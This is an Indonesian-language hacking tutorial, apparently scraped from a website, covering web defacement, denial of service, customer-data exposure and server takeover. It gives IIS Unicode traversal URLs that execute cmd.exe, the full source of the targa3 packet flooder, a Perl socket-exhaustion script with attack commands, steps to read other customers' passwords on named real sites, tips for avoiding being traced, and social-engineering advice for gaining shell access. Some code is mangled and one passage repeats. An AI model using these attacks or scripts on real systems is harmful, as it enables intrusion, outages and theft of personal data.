adalah :
- tftpd32.exe Tool ini digunakan untuk melakukan Upload index.html atau halaman depan yang telah kita siapkan yang
nantinya akan kita taruh dihalaman depan situs tersebut.
- ncx99.exe Tool ini digunakan untuk mengambil file index.html atau halaman depan dari situs yang telah berhasil kita
deface
- Unitools.tgz Tool ini digunakan untuk untuk melakukan tes, apakah situs sasaran bisa atau tidak untuk defacing.
Program ini hanya berjalan di Linux/Unix
Adapun langkah-langkah dalam melakukan defacing web adalah sebagai berikut:
- Pastikan server situs sasaran menggunakan sistem operasi MS Windows dan menjalankan Microsoft IIS 5.0. Untuk
mengentahuinya, Anda bisa cari di http://www.netcraft.com.
Berikut ini adalah contoh situs yang menggunakan sistem operasi Windows 2003 Server.
- Selanjutnya, kita pastikan sasaran kita, dengan melakukan pemindaian sasaran. Tujuan dari pemindaian ini adalah,
kita bisa emngetahui celah-celah yang terbuka dan memungkinkan bagi kita untuk melakukan serangan. Pemindaian ini
kita lakukan dengan menggunakan program nmap. Contohnya adalah sebagai berikut: [root@dir:~] # nmap -P0 -sT -v -
O www.nama_sasaran.com
Starting nmap 3.93 ( http://www.insecure.org/nmap/ ) at 2006-02-18 03:55 GMT
Initiating Connect() Scan against www.nama_sasaran.com (192.168.0.8) [1668
ports] at 03:55
Discovered open port 80/tcp on 192.168.0.8
Connect() Scan Timing: About 45.92% done; ETC: 03:56 (0:00:35 remaining)
The Connect() Scan took 77.65s to scan 1668 total ports.
Warning: OS detection will be MUCH less reliable because we did not find at
least 1 open and 1 closed TCP port
For OSScan assuming port 80 is open, 33786 is closed, and neither are firewalled
Host www.gramedia.com (192.168.0.8) appears to be up ... good.
Interesting ports on www.gramedia.com (192.168.0.8):
(The 1667 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
80/tcp open http
Device type: general purpose
Running: IBM AIX 4.X, Microsoft Windows 2003/.NET|NT/2K/XP
OS details: IBM AIX 4.3.2.0-4.3.3.0 on an IBM RS/*, Microsoft Windows 2003
Server or XP SP2, Microsoft Windows XP Home Edition (English) SP2, Microsoft
Windows XP Pro SP2, Microsoft Windows XP SP2
TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
IPID Sequence Generation: Incremental
Nmap finished: 1 IP address (1 host up) scanned in 81.771 seconds
Raw packets sent: 21 (1796B) | Rcvd: 7 (420B)
[root@dir:~] #
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
Contoh di atas adalah salah satu target sasaran yang cukup tangguh sistem keamanannya. Berikut ini, kita akan
lakukan pemindaian sekali lagi dengan sasaran yang agak lemah. Seperti ditunjukkan pada contoh berikut ini:
[root@dir:~] # nmap -P0 -sT -v -O www.sasaran2.com
Starting nmap 3.93 ( http://www.insecure.org/nmap/ ) at 2006-02-18 04:04 GMT
Initiating Connect() Scan against 64.62.165.135 [1668 ports] at 04:04
Discovered open port 3389/tcp on 64.62.165.135
Discovered open port 443/tcp on 64.62.165.135
Discovered open port 25/tcp on 64.62.165.135
Discovered open port 80/tcp on 64.62.165.135
Discovered open port 21/tcp on 64.62.165.135
Discovered open port 1248/tcp on 64.62.165.135
Discovered open port 1025/tcp on 64.62.165.135
Connect() Scan Timing: About 48.89% done; ETC: 04:05 (0:00:31 remaining)
Discovered open port 1026/tcp on 64.62.165.135
Increasing send delay for 64.62.165.135 from 0 to 5 due to max_successful_tryno
increase to 4
Discovered open port 2067/tcp on 64.62.165.135
The Connect() Scan took 88.85s to scan 1668 total ports.
For OSScan assuming port 21 is open, 1 is closed, and neither are firewalled
Host 64.62.165.135 appears to be up ... good.
Interesting ports on 64.62.165.135:
(The 1637 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
130/tcp filtered cisco-fna
131/tcp filtered cisco-tna
132/tcp filtered cisco-sys
133/tcp filtered statsrv
134/tcp filtered ingres-net
135/tcp filtered msrpc
136/tcp filtered profile
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
140/tcp filtered emfis-data
- 200/tcp filtered src
443/tcp open https
444/tcp filtered snpp
445/tcp filtered microsoft-ds
446/tcp filtered ddm-rdb
447/tcp filtered ddm-dfm
448/tcp filtered ddm-ssl
449/tcp filtered as-servermap
450/tcp filtered tserver
604/tcp filtered unknown
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1248/tcp open hermes
2067/tcp open dlswpn
3389/tcp open ms-term-serv
3984/tcp filtered mapper-nodemgr
Device type: general purpose
Running: Microsoft Windows 2003/.NET|NT/2K/XP
OS details: Microsoft Windows 2003 Server or XP SP2, Microsoft Windows 2000 SP3
TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
IPID Sequence Generation: Busy server or unknown class
Nmap finished: 1 IP address (1 host up) scanned in 97.715 seconds
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
Raw packets sent: 18 (1616B) | Rcvd: 10 (558B)
- Selanjutnya, kita lakukan scanning web server dengan menggunakan uni2.pl, untuk mengetahui apakah sasaran
tersebut itu vulnerable (rentan) atau tidak. Karena walaupun target Anda menggunakan Microsoft IIS 4.0/5.0 tetapi jika
sudah di-patch maka web sasaran tersebut tidak dapat di-deface.
Caranya adalah sebagai berikut: [root@dir:~] # uni2.pl www.situs_sasaran1.com
www.situs_sasaran1.com: Not vulnerable
Pastikan Anda menemukan sasaran yang lemah, sehingga hasil scanningnya akan menampilkan unicode seperti
contoh berikut: [root@dir:~] # uni2.pl www.situs_sasaran2.com
www.situs_sasaran2.com: is vulnerable
Ini berarti target yang Anda pindai (scanning) dapat dijadikan sasaran defacing.
- Tahap selanjutnya jika Anda sudah menemukan web server yang menjalankan Microsoft IIS 4.0/5.0 maka Anda
melakukan scanning dari Unixshell account Anda atau melalui komputer Anda yang menggunakan Operating System
(OS) Linux/Unix. Karena kita sudah mempunyai UnicodeScanner kita dapat melakukan Scanning dengan perintah
sebagai berikut : www.situs_sasaran.com/scripts/..%e0%80%af../winnt/system32/
cmd.exe?/c+dir+c:\
- Serangan pertama dengan Unicodexecute3.pl
"Unicodexecuite3.pl" adalah merupakan pemindai (scanner) lain yang didalamnya sudah terdapat unicode, tetapi cara
kerja tool ini hanya mencocokan unicode yang ada pada unicodececute terhadap target. Kelebihan tool ini adalah jika
kita memiliki unicode jenis lain, kita bisa memasukkannya kedalam tool ini. Sebenarnya sama saja kerjanya dengan
uni.pl dia juga memeriksa unicode yang terdapat di dalamnya, tetapi di uni.pl ada beberapa sintak program yang sangat
berbeda dengan unicodexecute3.pl ini.
Cara penggunaan unicodexecute3.pl adalah sebagai berikut ini :
[root@dir:~] # unicodexecute.pl nama_target
Misalnya sebagai berikut:
[root@dir:~] # unicodexecute.pl www.namatarget.com c:\winnt\wwwroot
Testing directory /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../
winnt/system32/cmd.exe?/c
testing directory /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/
cmd.exe?/c
testing directory /scripts/..%c0%af../winnt/system32/cmd.exe?/c
testing directory /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../
winnt/system32/cmd.exe?/c
testing directory /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../
winnt/system32/cmd.exe?/c
testing directory /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../
winnt/system32/cmd.exe?/c
testing directory /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../
winnt/system32/cmd.exe?/c
testing directory /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../
winnt/system32/cmd.exe?/c
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
nope...sorry..not vulnerable
Dari hasil diatas, berarti host target kita tidak bisa dilakukan defacing, karena Unicode telah ditest dan tidak ada yang
cocok satu pun. Selain. Kelemahan tool ini adalah, jika kita hanya memiliki atau bergantung pada Unicode yang ada
pada tool ini maka akan sulit sekali untuk mendapatkan sasaran yang mudah untuk dilakukan defacing. Jadi salah satu
cara untuk mendukung keberhasilan kita dalam menggunakan tool ini adalah mencari Unicode - Unicode lain dan kita
masukan ke dalam tool ini.
- Sekarang Anda dapat membuka web yang telah Anda deface dan jika file wwwroot filesnya bernama default.html
maka akan segera terlihat hasilnya. Tetapi jika Anda tidak melihat hasilnya maka wwwroot filesnya bukan bernama
default.html. Sebenarnya banyak sekali nama file wwwrootnya seperti, index.htm, index.asp, default.htm, default.html,
default.asp atau file lain yang telah ditentukan oleh si webmaster dari server tersebut.
Serangan pada Web Server
Serangan pada web server merupakan serangan yang populer di kalangan cracker. Tujuan dari serangan ini, adalah:
- Membuat situs tujuan menjadi down, karena bandwidth penuh
- Melakukan perubahan halaman situs tujuan
- Melakukan perusakan situs tujuan
- Mendapatkan informasi dari situs tujuan
- Mendapatkan akses 'root' pada server
Bermacam-macam tujuan cracker dalam melakukan serangan terhadap web server, seperti tersebut di atas
mempunyai tingkat kesulitan yang bertingkat. Umumnya layanan atau service yang digunakan pada server adalah
Apache.
Apache merupakan web server yang terpopuler di Internet. Banyak server-server terkenal di dunia yang menggunakan
Apache sebagai web servernya. Hal ini dikarenakan Apache merupakan web server yang tergolong hAndal, namun
gratis, Hampir semua penyedia layanan hosting terkemuka baik komersial maupun yang gratis yang bertebaran di
internet juga menggunakan atau menyediakan Apache sebagai web server mereka.
Denial of Service Attact
Denial of Service Attact atau yang lebih dikenal dengan DoS, adalah suatu serangan dengan cara mengirim paket
sampah (data tidak jelas / tidak terbaca) kepada alamat tujuan. Cara ini merupakan cara yang paling banyak dilakukan
oleh cracker di seluruh dunia. Dengan tujuan, situs atau server yang dituju tidak bisa diakses oleh semua user, termasuk
di-remote oleh system administratornya sendiri.
Berikut ini adalah contoh-contoh cara melakukan DoS dengan tools yang sudah ada pada masaji-slax.
Serangan dengan Targa3
Targa3 merupakan penyempurnaan dari targa dan targa2, kegunaan dari program ini adalah melakukan pengiriman
paket yang 'tidak biasa' kepada alamat yang dituju.
Hasil dari serangan ini adalah untuk membuat server menjadi 'down'. Sehingga tidak bisa diakses dari manapun juga.
Anda bisa melihat kode asalnya sebagai berikut:
1 /*
2 * targa3 - 1999 (c) Mixter
4 * IP stack penetration tool / 'exploit generator'
5 * Sends combinations of uncommon IP packets to hosts
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
6 * to generate attacks using invalid fragmentation, protocol,
7 * packet size, header values, options, offsets, tcp segments,
8 * routing flags, and other unknown/unexpected packet values.
9 * Useful for testing IP stacks, routers, firewalls, NIDS,
10 * etc. for stability and reactions to unexpected packets.
11 * Some of these packets might not pass through routers with
12 * filtering enabled - tests with source and destination host
13 * on the same ethernet segment gives best effects.
14 *
15 * Example:
16 * ./targa3 193.116.54.15 192.88.209.18 134.205.131.22 -c 1000
17 *
18 * Linux, *BSD:
19 * cc -Wall -O2 -s -o targa3 targa3.c
20 * IRIX, HPUX, OSF (untested yet):
21 * cc -ldld -o targa3 targa3.c
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
22 * Solaris, SunOS:
23 * cc -lnsl -lsocket -o targa3 targa3.c
24 *
25 */
26
27 #include
28 #include
#include
30 #include
31 #include
32 #include
33 #include
34 #include
35 #include
36 #include
37
38 u_char rseed[4096];
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
39 int rsi, rnd, pid;
40
41 #if __BYTE_ORDER == __LITTLE_ENDIAN
42 #ifndef htons
43 unsigned short int htons (unsigned short int hostshort);
44 #endif
45 #define TONS(n) htons(n)
46 #elif __BYTE_ORDER == __BIG_ENDIAN
47 #define TONS(n) (n)
48 #endif
49
50 struct sa_in
51 {
52 unsigned short int sin_family, sin_port;
53 struct
54 {
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
55 unsigned int s_addr;
}
57 sin_addr;
58 unsigned char sin_zero[8];
59 };
60
61 struct iph
62 { /* IP header */
63 #if __BYTE_ORDER == __LITTLE_ENDIAN
64 #define TONS(n) htons(n)
65 unsigned char ihl:4;
66 unsigned char version:4;
67 #elif __BYTE_ORDER == __BIG_ENDIAN
68 #define TONS(n) (n)
69 unsigned char version:4;
70 unsigned char ihl:4;
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
71 #endif
72 unsigned char tos;
73 unsigned short int tot_len;
74 unsigned short int id;
75 unsigned short int frag_off;
76 unsigned char ttl;
77 unsigned char protocol;
78 unsigned short int check;
79 unsigned int saddr;
80 unsigned int daddr;
81 };
82
83 unsigned long int inet_addr (const char *cp);
84
85 unsigned int
86 realrand (int low, int high)
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
87 {
88 int evil[2];
89 evil[0] = rseed[rsi];
90 evil[1] = rseed[rsi + 1];
91 rsi += 2;
92 if (evil[0] == 0x00)
93 evil[0]++;
94 if (evil[1] == 0x00)
95 evil[1]++;
96 srandom (time (0));
97 srand (random () << pid % evil[0] >> evil[1]);
/* don't ask :P */
98 return ((rand () % (int) (((high) + 1) - (low))) + (low));
99 }
100
101 void
102 sigh (int sig)
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
103 {
104 puts (" ] ^[[0m\n");
105 exit (0);
106 }
107
108 int
main (int argc, char **argv)
110 {
111 int s = socket (AF_INET, SOCK_RAW, 255); /* IPPROTO_RAW */
112 int res, psize, loopy, targets = 0, tind, count = -1;
113 char *packet, ansi[16];
114 struct sa_in sin;
115 struct iph *ip;
116 u_long target[200];
117
118 int proto[14] =
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
119 { /* known internet protcols */
120 0, 1, 2, 4, 6, 8, 12, 17, 22, 41, 58, 255, 0,
121 };
122 int frags[10] =
123 { /* (un)common fragment values */
124 0, 0, 0, 8192, 0x4, 0x6, 16383, 1, 0,
125 };
126 int flags[7] =
127 { /* (un)common message flags */
128 0, 0, 0, 0x4, 0, 0x1,
129 };
130
131 rnd = open ("/dev/urandom", O_RDONLY);
132 read (rnd, rseed, 4095);
133 rsi = 0;
134
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
135 snprintf (ansi, 15, "^[[%d;3%dm", realrand (0, 1),
realrand (1, 7));
136 printf ("\t\t%starga 3.0 by Mixter^[[0m\n", ansi);
fflush (stdout);
138
139 if (argc < 2) 140 { 141 fprintf (stderr, "usage: %s
argv[0]);
142 exit (-1);
143 }
144\begin
145 if (argc > 201)
146 {
147 fprintf (stderr, "cannot target more than 200 hosts!\n");
148 exit (-1);
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
149 }
150
151 for (loopy = 1; loopy < argc; loopy++) 152 { 153 if (strcmp (argv[loopy - 1], "-c") == 0) 154 { 155 if (atoi (argv[loopy]) > 1)
156 count = atoi (argv[loopy]);
157 continue;
158 }
159 if (inet_addr (argv[loopy]) != -1)\begin
160 {
161 target[targets] = inet_addr (argv[loopy]);
162 targets++;
163 }
}
165
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
166 if (!targets)
167 {
168 fprintf (stderr, "no valid ips found!\n");
169 exit (-1);
170 }
171
172 snprintf (ansi, 15, "^[[%d;3%dm", realrand (0, 1),
realrand (1, 7));
173 printf ("%s\tTargets:\t%d\n", ansi, targets);
174 printf ("\tCount:\t\t");
175 if (count == -1)
176 puts ("infinite");
177 else
178 printf ("%d\n", count);
179
180 printf (" [ ");
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
181 fflush(0);
182
183 for (res = 0; res < 18; res++) 184 signal (res, sigh); 185 186 pid = getpid (); 187 psize = sizeof (struct iph) + realrand (128, 512); 188 packet = calloc (1, psize); 189 ip = (struct iph *) packet; 190 setsockopt (s, 0, 3, "1", sizeof ("1")); /* IP_HDRINCL: header included */ 192 sin.sin_family = PF_INET; 193 sin.sin_port = TONS (0); 194 while (count != 0) 195 { 196 if (count != -1) http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24 197 count--; 198 for (loopy = 0; loopy < 0xff;) 199 { 200 for (tind = 0; tind < targets + 1; tind++)\begin 201 { 202 sin.sin_addr.s_addr = target[tind]; 203 if (rsi > 4000)
204 {
205 read (rnd, rseed, 4095);
206 rsi = 0;
207 }
208 read (rnd, packet, psize);
209 proto[13] = realrand (0, 255);
210 frags[9] = realrand (0, 8100);
211 flags[6] = realrand (0, 0xf);
212 ip->version = 4;
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
213 ip->ihl = 5;
214 ip->tos = 0;
215 ip->tot_len = TONS (psize);
216 ip->id = TONS (realrand (1, 10000));
217 ip->ttl = 0x7f;
218 ip->protocol = proto[(int) realrand (0, 13)];
ip->frag_off = TONS (frags[(int) realrand (0, 9)]);
220 ip->check = 0;
221 ip->saddr = random ();
222 ip->daddr = target[tind];
223 res = sendto (s,
224 packet,
225 psize,
226 flags[(int) realrand (0, 6)],
227 (struct sockaddr *) &sin,
228 sizeof (struct sockaddr));
229 if (res)
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
230 loopy++;
231 }
232 }
233 snprintf (ansi, 15, "^[[%d;3%dm", realrand (0, 1),
realrand (1,7));
234 printf ("%s.", ansi);
235 usleep (200);\begin
236 fflush (stdout);
237 }
238
239 free (packet); /* free willy */
240
241 puts (" ]^[[0m\n");
242
243 return 0;
244 }
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
245
246 /* After cutting this line, md5sum will be
6550270c101b4895c8c0fb4b75881421 */
Anda bisa menyalin kode tersebut dan mengompilasinya sendiri, atau kalau malas, sudah ada versi jadinya pada
masaji-slax.
Adapun cara penggunaannya adalah sebagai berikut:
\begin
[root@dir:~] # targa3 [alamat_asal] [alamat_tujuan] -c [jumlah]
Misalnya, kita akan melakukan serangan pada server dengan alamat asalnya adalah 192.168.0.1 dan alamat tujuannya
adalah 192.168.100.254, dengan jumlah paket yang kita kirimkan adalah 5000. Kita bisa ketikkan sintaks perintahnya
sebagai berikut:
[root@dir:~] # targa3 192.168.0.1 192.168.100.254 -c 5000
Contoh dari serangan tersebut di atas bisa kita lihat pada gambar berikut ini:
Hasil dari serangan ini adalah server tujuan menjadi 'down', tidak bisa diakses sama sekali. Pada contoh gambar
berikut ini, Anda bisa melihat adanya kenaikan bandwidth yang luar biasa pada alamat IP 192.168.100.254
Menggantung Socket
Menggantung socket, artinya kita melakukan hubungan ke web server (port 80), namun setelah koneksi TCP terjadi,
klien tidak melakukan apa apa. Hasil dari menggantung soket ini adalah, Apache akan menunggu sekian waktu sesuai
dengan nilai time out yang ditentukan pada httpd.conf, karena semua soket telah dipenuhi, maka apache tidak merespon
koneksi port 80 baru, sebelum soket soket yang telah penuh tadi time out, hal ini membuat efek seolah-olah webserver
tersebut 'down'.
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
Berikut ini, contoh skrip perl sederhana untuk menggantung soket:
#!/usr/bin/perl
#
# Nama program: gantung.pl
#
# Pembuat: hartx
#
# Fungsi : membuat efek seolah olah webserver yang bersangkutan down
#
# Cara penggunaan: gantung.pl
use IO::Socket
$|++;
$a=1;
for (1..$ARGV[2])
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
{
$fh{$_}=new IO::Socket::INET
PeerAddr=>"$ARGV[0]",
PeerPort=>$ARGV[1],
Proto=>"tcp"
or die;print "$_ $a\n"
}
Cara penggunaannya adalah sebagai berikut:
[root@dir:~] # gantung.pl www.situs_tujuan.com [port]
[time out dalam detik]
Misalnya, kita akan menyerang situs tujuan dengan port 80 dan lama time out adalah 2 juta detik. Kita ketikkan sebagai
berikut:
[root@dir:~] # gantung.pl www.situs_tujuan.com 80 2000000
Contoh serangannya bisa Anda lihat pada gambar berikut ini:
Hasilnya, situs tujuan (192.168.100.254) tidak bisa diakses sama sekali. Seperti terlihat pada contoh gambar berikut ini:
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
Membuka Database pribadi pada situs
Membuka data pribadi dari pelanggan sebenarnya sangat tidak etis, namun demi kepentingan pendidikan (katanya) hal
ini mungkin bisa dimaklumi. Berikut ini merupakan salah satu pengalaman salah seorang netter di situs jasakom.com.
Dia melakukan perbuatan iseng, dengan cara mencoba-coba mengetikkan karakter tambahan pada suatu situs. Anda
bisa mempraktekkannya dengan cara sebagai berikut:
- Nyalakan komputer Anda
- Jalankan akses internet,
- Pada browser (bisa IE, Firefox atau browser lainnya), ketikan alamat situs berikut ini: TBM3-Getting-Ready-For-Date-
010.jpg http://http://www.angioprim.com/CustLogin.asp
- Selanjutnya akan muncul form pengisian, seperti yang Anda lihat pada gambar berikut ini:
- Lanjutkan dengan mengisi sembarang data, pastikan Anda mengisi data sampah. Sehingga bila terjadi pelacakan log
data, Anda tidak terlacak :). Contoh pengisiannya bisa Anda lihat pada gambar berikut ini:
- Jika Anda sudah selesai mengisi semua kolom pada form yang ada, lanjutkan dengan menekan tombol [Save and
Continue]
- Untuk melihat password orang lain yang ada pada situs tersebut, pada bagian `CustomerID`=, coba Anda ketikkan
angka sembarang, misalnya 22987.
- Selanjutnya, Anda bisa melihat data-data pribadi dari pelanggan pada situs www.angioprim.com. Seperti terlihat
dengan jelas pada contoh gambar berikut ini:
Dari contoh di atas, kita tahu bahwa kebanyakan user, baik yang tersambung pada jaringan internet, maupun pada
jaringan lokal sering kali malas mengingat password atau kata sandi. Sehingga sering kali terlihat password mereka
sama dengan nama user yang mereka gunakan.
Kami sering kali menemukan hal seperti ini, baik di lingkungan institusi pemerintah maupun swasta, bahkan pada
nama pelanggan yang melakukan hosting maupun transaksi online di internet.
Berikut ini adalah contoh mengenai pembobolan informasi pada situs training dan karir, yang berpusat di Amerika.
Adapun caranya adalah sebagai berikut:
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
- Kami asumsikan PC Anda dalam kondisi masih menyala.
- Jalankan sembarang browser, misalnya: IE, Opera, Firefox atau lainnya.
- Anda akses situs google, sebagai berikut:
- Kemudian, ketikkan isi dari suatu situs sebagai berikut: "allinurl:CustomerID=256"
- Sesaat kemudian, Google akan menampilkan pencarian dari sintaks tersebut di atas. Seperti terlihat pada contoh
berikut ini:
- Sekarang, Anda klik pada bagian kalimat di bawah ini:
http://www.trustech.org/corporate/Customers/Reports/CUSTOMERRecord.asp?
CustomerID=254&s_CustomerID=&s_Last_Name=&s_Login=&.
Sebagaimana terlihat pada gambar berikut:
- Kemudian pada kolom [Status], jadikan
- aktive.
- Dan pada kolom 'Select Customer Type', ubahlah menjadi 'MEMBER'. Seperti terlihat pada gambar berikut ini:
- Selanjutnya, Anda akan melihat semua data-data pribadi dari anggotanya, sampai dengan nama user dan password
dari semua pelanggan. Seperti terlihat pada gambar berikut ini.
- Dengan demikian, Anda bisa menjadi member dari situs ini dengan cara yang mudah dan gratis.
Pengambilalihan Server
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
Pengambilalihan (take over) suatu server di internet, merupakan usaha atau aksi yang memerlukan kesabaran yang
tinggi dan membutuhkan usaha yang ulet. Anda jangan pernah membayangkan bahwa pengambilalihan server, adalah
proses yang mudah dan cepat, kecuali bila System Administratornya adalah pemula atau orang yang ceroboh.
Proses pengambil alihan server atau server Hijacking bisa melalui beberapa cara. Antara lain sebagai berikut:
- Sniffing (penyadapan), baik lewat jaringan lokal maupun melalui internet
- Scanning (pemindaian) sasaran melalui internet maupun jaringan lokal, jika sasarannya ada di dekat Anda. Misalnya,
server di kantor Anda atau di institusi dimana Anda ingin melakukan pengambilalihan.
- Melalui pemasangan program keylogger pada PC yang Anda gunakan.
- Melalui pendekatan emosional, cara ini merupakan cara yang sering kali dipakai dan terbukti ampuh. Kita hanya perlu
berkenalan dengan orang dalam. Bilamana hubungan kita sudah dekat, kita coba untuk minta akses ke server, mungkin
dengan alasan agar bisa menitipkan data di sana. Lebih baik lagi bilamana kita juga bisa meminta akses 'shell', dengan
alasan mungkin untuk melakukan pemeliharaan data, jika kita hosting pada server yang bersangkutan atau untuk alasan
belajar Linux/Unix.
Karena jika kita sampai memiliki akses shell, kita akan bisa berubah menjadi root dalam sekejap. Pembahasan
mengenai hal ini akan kita lanjutkan pada bagian inti dari bab ini.
Cara-cara yang akan kita lakukan tersebut di atas, memerlukan lebih sedikit program aplikasi (tools) dari pada
menggunakan metode script kiddies. Namun memerlukan tingkat kesabaran yang sangat tinggi. Proses ini memerlukan
waktu sedikitnya dua bulan, untuk benar-benar bisa mendapatkan user dan password, terlebih untuk mendapatkan
password 'root' secara gratis. Mari kita mulai.
- Menetapkan sasaran / target Kita harus memastikan terlebih dahulu sasaran yang akan kita 'bajak'. Misalnya, server
utama di warung internet.
- Mencari alamat IP server utama Pencarian alamat IP server utama, sangat perlu diketahui. Karena hanya dengan ini
kita bisa masuk ke server utama.
Kami sangat mengharapkan, Anda memiliki pengetahauan tentang penggunaan sistem operasi Linux/Unix. Karena
sistem ini memiliki kemudahan untuk mengakses shell dengan baik. Alasan lain adalah, karena penulis sendiri kurang
paham menggunakan Windows :). Adapun caranya adalah sebagai berikut
- Sniffing (penyadapan), baik lewat jaringan lokal maupun melalui internet
- Scanning (pemindaian) sasaran melalui internet maupun jaringan lokal, jika sasarannya ada di dekat Anda. Misalnya,
server di kantor Anda atau di institusi dimana Anda ingin melakukan pengambilalihan.
- Melalui pemasangan program keylogger pada PC yang Anda gunakan.
- Melalui pendekatan emosional, cara ini merupakan cara yang sering kali dipakai dan terbukti ampuh. Kita hanya perlu
berkenalan dengan orang dalam. Bilamana hubungan kita sudah dekat, kita coba untuk minta akses ke server, mungkin
dengan alasan agar bisa menitipkan data di sana. Lebih baik lagi bilamana kita juga bisa meminta akses 'shell', dengan
alasan mungkin untuk melakukan pemeliharaan data, jika kita hosting pada server yang bersangkutan atau untuk alasan
belajar Linux/Unix.
Karena jika kita sampai memiliki akses shell, kita akan bisa berubah menjadi root dalam sekejap. Pembahasan
mengenai hal ini akan kita lanjutkan pada bagian inti dari bab ini.
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
Cara-cara yang akan kita lakukan tersebut di atas, memerlukan lebih sedikit program aplikasi (tools) dari pada
menggunakan metode script kiddies. Namun memerlukan tingkat kesabaran yang sangat tinggi. Proses ini memerlukan
waktu sedikitnya dua bulan, untuk benar-benar bisa mendapatkan user dan password, terlebih untuk mendapatkan
password 'root' secara gratis. Mari kita mulai.
- Menetapkan sasaran / target Kita harus memastikan terlebih dahulu sasaran yang akan kita 'bajak'. Misalnya, server
utama di warung internet.
- Mencari alamat IP server utama Pencarian alamat IP server utama, sangat perlu diketahui. Karena hanya dengan ini
kita bisa masuk ke server utama.
Kami sangat mengharapkan, Anda memiliki pengetahauan tentang penggunaan sistem operasi Linux/Unix. Karena
sistem ini memiliki kemudahan untuk mengakses shell dengan baik. Alasan lain adalah, karena penulis sendiri kurang
paham menggunakan Windows :). Adapun caranya adalah sebagai berikut
- Melalui jaringan lokal Untuk melihat nomor IP pada klien Windows, Anda bisa melakukannya dengan cara sebagai
berikut:
- Tekan tombol [Start] - [Run], seperti pada contoh gambar berikut ini:
- Selanjutnya akan muncul jendela [Run], seperti pada contoh gambar berikut:
- Ketikkan sintaks perintah cmd
- Setelah muncul jendela command prompt, ketikkan sintaks sesuai dengan contoh gambar berikut ini:
- Anda akan melihat konfigurasi dari PC yang Anda gunakan sesuai dengan contoh gambar berikut:
Pada contoh gambar, terlihat bahwa nomor IP dari komputer yang kita gunakan adalah 192.168.0.1 dan gateway atau
nomor IP dari server adalah 192.168.0.254.
Ini merupakan petunjuk awal dari sasaran yang sudah kita tetapkan bersama. Tentunya masing-masing sasaran nomor
IP-nya berbeda, tergantung dari kebijakan masing-masing system administrator. Ini hanyalah contoh semata.
- Selanjutnya kita ambil program snort melalui akses internet, bisa dari rumah atau dari warnet yang bersangkutan
- Anda bisa mengambil snort versi Windows maupun Linux dan menginstalasainya pada flashdisk yang Anda miliki,
sehingga tidak akan dilihat oleh operator warnet.
